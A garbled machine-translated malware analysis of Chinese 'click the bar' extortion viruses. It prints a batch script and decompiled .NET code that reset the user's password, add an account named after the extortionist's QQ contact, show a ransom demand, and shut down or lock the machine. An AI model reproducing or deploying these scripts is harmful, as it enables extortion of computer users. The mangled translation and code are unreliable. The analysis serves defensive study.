Virus Trojan scan: A. NET-based research on "Hitting the bar" virus
I. Preface: since the development of malicious programs, their functions have evolved from simple destruction to privacy spying, information theft, and even the very popular "Hitting the barriers" virus, used for extortion. It can be seen that with the development of the times, virus writers often want to use their own technologies to obtain the money of injustice and become more and more profitable. This series of articles also adapted to this development, from virus discussion to Trojan horse, and then came to the discussion of the virus.
2. What is the "Click farming" virus? In fact, the "Click farming" virus is very simple. It is used to tamper with the boot password of our computer, and then the virus author leaves his personal contact information, ask the affected user to contact him and spend money on disaster recovery. Others), "Free Q coins" and other highly attractive names, once the user clicks to run, the system login password will be tampered. In this case, common users are often powerless. In addition, the amount of money for "Blackmail" is generally not large, so there are not a few people who spend money to buy passwords. Since this virus does not require the authors to have a very high level of technology, it also contributes to the prevalence of "Hacking. Here is an example of the simplest "click on the bar" Code. It is a batch processing (. bat) file:
[Plain] view plaincopy
@ Echo off net user Jiang Jun wojiushimima
Net user to add the password QQ123456789 wojiushimima/add shutdown.exe-s-t 10
The above code is briefly described here. The second line of the Code means to change the account password named "Jiang Yi" to "wojiushimima" (I am the password ). Note: in my system, "Ginger" is the Administrator account. In most cases, the default Administrator Account name is "Administrator. We also urge you not to use "Administrator" as the Administrator account name, so as not to be exploited by malicious programs. The third line of the Code indicates creating an account named "add a password to QQ123456789", and the password is also "wojiushimima ". The fourth line of the Code indicates that the computer is disabled 10 seconds later. Run the above Code ,:
Figure 1 run the "Click farming" virus
After the program runs for 10 seconds, it automatically shuts down and restarts, as shown in:
Figure 2
It can be seen that there are two accounts, one being the original account, but the password has been changed. Another account is the contact information of the virus author. We do not know the password of this account. So far, in order to be able to use your computer properly, normal computer users can only contact the virus author to buy a password.
Iii. What is. NET
Since this article is about A. NET-based "click it", it is necessary to briefly discuss what is. NET here.
Actually. NET is a platform designed by Microsoft independent of the operating system. It can be regarded as a virtual machine, no matter what operating system the machine runs, as long as the system is installed.. NET Framework. NET executable program, enjoy.. NET. The above sentence is from the user's point of view, if you understand from the perspective of Windows,. NET is a series of DLL files running on the Ring3 layer.
This may still be abstract. Interested readers can query relevant books for further study. I personally think we do not need to care too much about this definition. As a virus analyst, it is more important to master the Reverse Analysis Method of the. NET platform.
. NET has a feature, that is, whether the program is written in C #, C ++, or VB, it is eventually compiled into the. NET intermediate language IL. Static analysis. NET programs use decompilation tools to decompile the instruction bytes of programs into IL commands or advanced languages, and read the decompilation code to understand the procedures and functions of the program. Because the executable files under. NET save metadata and IL code at the same time, the static decompilation code is highly readable and almost equivalent to the source code.
Iv. Virus analysis
This virus sample is named mongocf.exe. It can be seen from the name that it is related to the game "Crossing the FireWire". It is disguised as a game Helper Program, which is actually a "Hitting the bar ". But what's special about it is that it uses the. NET Framework groundbreaking and instantly looks different. Why do I know it uses the. NET Framework? This is the credit of PEiD:
Figure 3
Then we will use Reflector to load the virus sample. Because the code generated after Reflector analysis is like the source code, it is easy to find the core location of malicious programs:
Figure 4
The complete code for this function is as follows:
Private void timereffectick (object sender, EventArgs e) {this. j ++; if (this. j <= 3) {this. label4.Text = "scanning CF Network Vulnerabilities \ x00b7 \ x00b7 \ x00b7"; this. progressBar1.Value = this. j;} else if (this. j <= 5) & (this. j> 3) {this. label4.Text = "monitoring CF module SX action \ x00b7 \ x00b7"; this. progressBar1.Value = this. j;} else if (this. j <10) & (this. j> 5) {this. label4.Text = "avoiding SX loading auxiliary module \ x00b7 \ x00b7 \ x00b7"; this. progres SBar1.Value = this. j;} else if (this. j = 10) {this. label4.Text = "when the module is loaded successfully, \ x00b7 \ x00b7 \ x00b7"; this. progressBar1.Value = this. j; ResetUserPassword (Environment. userName, "razggcd"); MessageBox. show ("anti-plug-in alliance prompts you: creating a fair competitive platform for the healthy life of Green Games! For your computer security, please recharge QQ: 1460459195 to 30QB and add friends to ask for a password! Thank you for your cooperation! "," Message ", MessageBoxButtons. OK, MessageBoxIcon. Asterisk); CreateNTUser (" add Q1460459195 "," razggcd "," "); LockWorkStation ();}}
Obviously, the increasing number of counters used by the program to display different texts creates an illusion for users that the game assistant has taken effect and seems to be running the same way. When the counter increases from 10, the last if statement is executed. In this statement, the ResetUserPassword is used to change the user password to "razggcd", and then a piece of information is displayed, asking the user to contact the virus author to obtain the password, so as to "break down the discussion ". Next, create a user named "add Q1460459195" with the password "razggcd. Finally, lock the workstation to protect it from unauthorized use. This entire process is similar to the batch processing version I discussed earlier. It can be seen that although the virus has changed its external form, its internal mechanism remains unchanged.
Through the above analysis, we have obtained the password, and that's all done.
V. Summary
Compared with the previously analyzed virus and Trojan Horse, the analysis of "Hitting the bar" is actually very simple. In particular, the Program Based on. NET can be equivalent to the source program, which is much easier to understand than the assembly code. As "click on the bar" is the mainstream, I will choose some representative "click on the bar" for research in the future. We hope that everyone will be able to improve their awareness of defense and make the programmers of these programs accessible.